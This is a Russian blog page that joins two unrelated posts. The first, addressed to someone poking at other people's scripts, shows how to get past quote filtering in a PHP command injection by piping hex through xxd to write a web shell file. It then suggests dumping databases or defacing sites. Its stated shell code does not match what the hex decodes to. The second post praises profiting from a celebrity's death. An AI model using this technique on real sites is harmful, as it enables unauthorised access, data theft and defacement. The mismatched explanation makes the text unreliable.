neudor

Предположим, вы ковыряете чужой скрипт, и нашли место где можно внедриться в функцию исполнения системного кода (типа system или shell_exec). При этом кавычки по какой-то причине запрещены — ну там magic_quotes_gpc, все дела. Как тогда получить шелл? А очень просто.

Я обычно сначала тестю на создание файлов
echo 746573740a | xxd -r -p > ./shell.php

А потом уже само внедрение.

echo 3c3f7365745f74696d655f6c696d69742830293b6576616c2\
87374726970736c617368657328245f524551554553545b615d29293b3f3e0a \
| xxd -r -p > ./shell.php

Скрипт выше создаёт шелл с кодом
<?php set_time_limit(0);exec(stripslashes($_REQUEST[a])); ?>

Ну а дальше всё. Смотреть конфиги, дампить базу, ну или тупо дефейсить — хотя это самый глупый и неинтересный вариант.

Нет, пост не о том, что кто-то умер и надо скорбить. Пост о том, как расторопные и гениальные люди зарабатывают деньги просто на происходящих вокруг событиях.

http://ismichaeljacksonstillalive.com/ (внимательно читаем url)
Этот сайт вчера и позавчера летал по всему твиттеру. Но почему-то там ничего нет для монетизации. А можно было повесить сверху просто adsense со ссылками. Гениально и просто. Времени на изготовление – 5 минут.

Пока ажиотаж не спал – можно попробовать придумать что-то ещё подобное. Только не надо мне говорить об уважении, памяти и прочей атрибутийной ерунде. Я прошу обратить на это внимание только как на способ нестандартного мышления. По-моему, это просто офигенно!